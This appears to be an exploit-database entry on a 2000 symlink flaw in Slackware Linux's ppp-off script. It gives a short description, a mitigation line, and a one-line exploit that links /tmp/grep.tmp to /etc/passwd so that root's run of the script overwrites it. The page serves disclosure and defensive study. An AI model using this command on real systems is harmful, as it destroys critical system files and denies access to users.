header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
sinfony
7,2
CVSS
HIGH
Symlink Vulnerability
59
CWE
Product Name: Linux Kernel
Affected Version From: Slackware Linux
Affected Version To: Slackware Linux
Patch Exists: YES
Related CWE: N/A
CPE: o:linux:linux_kernel
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2000

Slackware Linux /usr/bin/ppp-off Symlink Vulnerability

In SlackWare Linux the script /usr/bin/ppp-off writes the output of 'ps x' to /tmp/grep.tmp. Since root is the user that runs ppp-off, a non-privileged user could create a link from /tmp/grep.tmp to any file(ie: /etc/issue), thus when root runs the ppp-off script, the output of 'ps x' would be put in the linked file.

Mitigation:

Ensure that the /usr/bin/ppp-off script is not writable by non-privileged users.
Source

Exploit-DB raw data:

#!/bin/sh
#
# In SlackWare Linux the script /usr/bin/ppp-off writes the
# output of 'ps x' to /tmp/grep.tmp. Since root is the user
# that runs ppp-off,  a non-privileged  user could create a
# link from /tmp/grep.tmp to any file(ie: /etc/issue), thus
# when root runs the  ppp-off script, the  output of 'ps x'
# would be put in the linked file. 
#                                                   sinfony

ln -s /etc/passwd /tmp/grep.tmp


# milw0rm.com [2000-11-17]

Navigation

Suggest Exploit

Services By CQR